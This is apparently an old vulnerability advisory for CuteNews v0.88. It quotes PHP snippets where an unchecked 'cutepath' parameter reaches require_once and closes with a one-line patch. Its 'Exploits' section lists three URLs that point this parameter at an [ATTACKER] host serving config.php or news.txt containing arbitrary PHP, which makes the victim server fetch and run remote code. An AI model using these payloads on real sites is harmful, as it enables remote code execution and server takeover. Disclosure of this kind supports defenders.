PHP source code injection in CuteNews Informations : =============================================== Script : CuteNews v0.88 Offical site : http://air.langame.net/ =============================================== PHP Scripts : =============================================== shownews.php : if(!$cutepath) $cutepath="."; require_once("$cutepath/config.php"); {.........} $all_news=file("$cutepath/news.txt"); =============================================== search.php : require_once("$cutepath/config.php"); =============================================== comments.php : if(!$cutepath){$cutepath=".";} require_once("$cutepath/config.php"); =============================================== Exploits : http://[VICTIM]/cutenews/shownews.php?cutepath=http://[ATTACKER]/ http://[VICTIM]/cutenews/search.php?cutepath=http://[ATTACKER]/ http://[VICTIM]/cutenews/comments.php?cutepath=http://[ATTACKER]/ with : http://[ATTACKER]/config.php http://[ATTACKER]/news.txt Content config.php or news.txt: Any PHP Code. =============================================== Patch : Replace if(!$cutepath){$cutepath=".";} require_once("$cutepath/config.php"); on $cutepath="."; =============================================== Best Regards, Over_G [DWC Gr0up] and VenoM Please visit: www.DWCgr0up.com www.OverG.com www.hack-tools.org Mail: OverG@mail.ru VenoM88@mail.ru
